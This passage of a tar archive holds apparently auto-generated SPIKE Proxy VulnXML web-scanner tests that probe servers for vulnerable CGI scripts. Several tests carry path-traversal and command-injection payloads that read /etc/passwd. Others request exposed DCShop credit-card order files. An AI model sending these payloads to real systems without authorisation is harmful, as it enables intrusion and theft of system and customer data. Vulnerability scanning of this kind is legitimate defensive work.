[Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-936.xml0100664000076500007650000000714007566204543021670 0ustar davedave (clickresponder.pl) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}clickresponder.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-937.xml0100664000076500007650000000704407566204543021674 0ustar davedave (code.php) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}code.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-938.xml0100664000076500007650000000704607566204543021677 0ustar davedave (code.php3) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}code.php3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-939.xml0100664000076500007650000000713007566204543021672 0ustar davedave (commandit.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}commandit.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-940.xml0100664000076500007650000000732207566204543021665 0ustar davedave (commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html) "This CGI allows attackers to read arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-941.xml0100664000076500007650000000730207566204543021664 0ustar davedave (common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd) "This CGI allows attackers to read files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-942.xml0100664000076500007650000000715207566204543021670 0ustar davedave (compatible.cgi) "This COWS (CGI Online Worldweb Shopping) script may give system information to attackers 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}compatible.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-943.xml0100664000076500007650000000711607566204543021671 0ustar davedave (Count.cgi) "This may allow attackers to execute arbitrary commands on the server" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}Count.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-944.xml0100664000076500007650000000704607566204543021674 0ustar davedave (count.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}count.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-945.xml0100664000076500007650000000712407566204543021672 0ustar davedave (counter-ord) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}counter-ord HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-946.xml0100664000076500007650000000713007566204543021670 0ustar davedave (counterbanner) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}counterbanner HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-947.xml0100664000076500007650000000714007566204543021672 0ustar davedave (counterbanner-ord) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}counterbanner-ord HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-948.xml0100664000076500007650000000714007566204543021673 0ustar davedave (counterfiglet-ord) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}counterfiglet-ord HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-949.xml0100664000076500007650000000714007566204543021674 0ustar davedave (counterfiglet/nc/) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}counterfiglet/nc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-950.xml0100664000076500007650000000740007566204543021663 0ustar davedave (csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')) "Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-951.xml0100664000076500007650000000740207566204543021666 0ustar davedave (csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')) "Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-952.xml0100664000076500007650000000702507566204543021670 0ustar davedave (csh) "Shell found in CGI dir!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}csh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-953.xml0100664000076500007650000000740607566204543021674 0ustar davedave (csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')) "Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-954.xml0100664000076500007650000000737607566204543021703 0ustar davedave (csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')) "Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd') HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-955.xml0100664000076500007650000000742107566204543021673 0ustar davedave (csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`) "csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. CAN-2002-0495." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd` HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-956.xml0100664000076500007650000000704407566204543021675 0ustar davedave (cstat.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cstat.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-957.xml0100664000076500007650000000706007566204543021674 0ustar davedave (c_download.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}c_download.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-958.xml0100664000076500007650000000706607566204543021703 0ustar davedave (dasp/fm_shell.asp) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dasp/fm_shell.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-959.xml0100664000076500007650000000707007566204543021677 0ustar davedave (day5datacopier.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}day5datacopier.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-960.xml0100664000076500007650000000714607566204543021673 0ustar davedave (day5datanotifier.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}day5datanotifier.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-961.xml0100664000076500007650000000717607566204543021677 0ustar davedave (db2www/library/document.d2w/show) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}db2www/library/document.d2w/show HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-962.xml0100664000076500007650000000713607566204543021674 0ustar davedave (dbman/db.cgi?db=no-db) "This CGI allows remote attackers to view system information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dbman/db.cgi?db=no-db HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-963.xml0100664000076500007650000000713207566204543021671 0ustar davedave (db_manager.cgi) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}db_manager.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-964.xml0100664000076500007650000000713007566204543021670 0ustar davedave (DCFORMS98.CGI) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}DCFORMS98.CGI HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-965.xml0100664000076500007650000000734307566204543021677 0ustar davedave (dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00) "This install of DCForum allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-966.xml0100664000076500007650000000725607566204543021703 0ustar davedave (dcshop/auth_data/auth_user_file.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dcshop/auth_data/auth_user_file.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-967.xml0100664000076500007650000000725607566204543021704 0ustar davedave (DCShop/auth_data/auth_user_file.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}DCShop/auth_data/auth_user_file.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-968.xml0100664000076500007650000000723007566204543021675 0ustar davedave (dcshop/orders/orders.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dcshop/orders/orders.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-969.xml0100664000076500007650000000723007566204543021676 0ustar davedave (DCShop/orders/orders.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}DCShop/orders/orders.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-970.xml0100664000076500007650000000704607566204543021673 0ustar davedave (dfire.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dfire.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-971.xml0100664000076500007650000000714607566204543021675 0ustar davedave (diagnose.cgi) "This COWS (CGI Online Worldweb Shopping) script may give system information to attackers 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}diagnose.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 